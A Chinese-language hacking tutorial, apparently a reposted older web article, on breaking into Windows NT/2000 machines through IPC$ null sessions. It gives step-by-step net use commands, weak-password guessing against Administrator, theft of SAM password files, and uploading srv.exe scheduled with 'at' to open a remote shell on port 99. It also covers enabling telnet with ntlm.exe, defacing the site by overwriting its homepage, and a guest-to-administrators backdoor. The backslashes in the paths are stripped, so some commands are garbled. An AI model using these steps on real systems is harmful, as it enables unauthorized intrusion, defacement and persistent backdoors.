IPC$的定义:IPC$是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,在远程管理计算机和查看计算机的共享资源时使用。
IPC$的作用:利用IPC$可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,可以得到用户列表,并配合字典,进行密码尝试。
IPC$空连接主机步骤:
1、首先要扫到能建立IPC$空连接的主机,有了目标才能进攻,推荐使用安全焦点的xscan_gui v1.3,该软件使用方法很简单,而且速度快,也许还能扫出其他漏洞。
2、详细了解NET命令,做IPC$空连接主机是不可不知NET命令使用的。
3、如果知道对方的用户名和密码,就用下面这个命令:
net use \127.0.0.1ipc$ ”密码” /user:”用户名”
退出的命令是:
net use \127.0.0.1ipc$ /delte
4、大部分情况下我们都不知道对方机器的用户名和密码。这就需要知道他的IP,我们使用用ping命令,格式为:ping www.xxx.com(如果用QQ聊天更简单,现在好多QQ都显IP的), 用追捕查他的操作系统,用户名等。现在信息都有了,然后大家试试弱智点的密码,如:123,12345,123456,用户名就是Administrator。运气好的话就可以进入了。
5、实在猜不出密码的话就只有用榕哥的大作――流光,运行探测――扫描POP3/FTP/NT/SQL主机,会出现“主机扫描设置”,在“扫描范围”中分别填写“开始地址”与“结束地址”,这步你可以选择要扫描的IP段,也可以只填某一IP,扫描主机类型”选择“NT/98”,然后开始扫描,如果单扫某一IP,我建议扫描主机类型选ALL,选项选中的内容不要取消,这样可以看看他的机器是什么颜色的,具体表示看下表:
红色:该主机安装了FrontPage扩展,并没有权限设置。如果扫到红色的,你可以打开FrontPage,在打开那里填上他的IP地址,接着你就知道怎么做了。
蓝色:表示该主机上安装了FrontPage扩展。
黑色:远程执行命令。你可以单击该主机――连接,就可以用DOS命令操作远程计算机,如:dir c:
黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后用LC3可以解开)。
绿色:将对方SAM文件上传到指定的FTP服务器。
6、现在知道了他主机的情况,就可以开始探测他的用户列表了!右键点IPC$主机-探测-探测所有IPC$用户列表,下面两个对话框的设置都选上,我们只要IPC$管理员的弱口令。在结果点击右键,探测用户列表,Administrstor(超级用户)直接探测到ADMIN的密码,如果实在不行,我们还可以拿其他用户“开刀”,然后在想办法让他变成超级用户。
7、得到用户名和密码我们就可以连接了。打开win2000下的cmd.exe(也就是命令提示符)。然后重复第二步教过的连接连接命令:
net use \127.0.0.1ipc$ ”密码” /user:”用户名”
成功连接后显示命令成功完成。
8、现在你可以用copy命令把你想要上传的东西放到他的机器里。
9、如果你想黑他页面的话就找到网页所在的目录,如:c:inetpubwwwroot,用命令:
copy c:index.htm \IP地址c$inetpubwwwroot
这里的c:index.htm指的是你作好的网页,上传替换掉原先的文件就可以改他的主页。
其他的操作方式就自己开发吧!以下提供几条有用的命令:
建立空连接
net use \IPipc$ ”" /user:”"
建立非空连接
net use \IPipc$ ”用户名” /user:”密码”
映射默认共享
net use z: \IPc$ ”密码” /user:”用户名” (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令:
net use z: \IPc$
删除一个ipc$连接
net use \IPipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
经典入侵示例
1.C:>net use \127.0.0.1IPC$ ”" /user:”admintitrators”
这是用《流光》扫到的用户名为administrators,密码为”空”的IP地址,如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:>copy srv.exe \127.0.0.1admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:>net time \127.0.0.1
查查时间,发现127.0.0.1 的当前时间是2005/5/1上午11:00,命令成功完成。
4.C:>at \127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然无法启动)。
5.C:>net time \127.0.0.1
再查查到时间没有,如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6.C:>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了。
7.C:>copy ntlm.exe \127.0.0.1admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8.C:WINNTsystem32>ntlm
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现”DONE”的时候,就说明已经启动正常。然后使用”net start telnet”来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!然后你想做什么就做什么吧。
为了以防万一,我们再把guest激活加到管理组。
10.C:>net user guest /active:yes
将对方的Guest用户激活。
11.C:>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码。
12.C:>net localgroup administrators guest /add
将Guest变为Administrator (如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) 。
其他操作就看您的能力和水平了,自己揣摩吧!
注:此为本人几年前收藏的经典网文,虽然好多命令和工具均已无法正常运行,但其思路和方法仍然值得网络安全爱好者学习,在此向原作者表示致敬!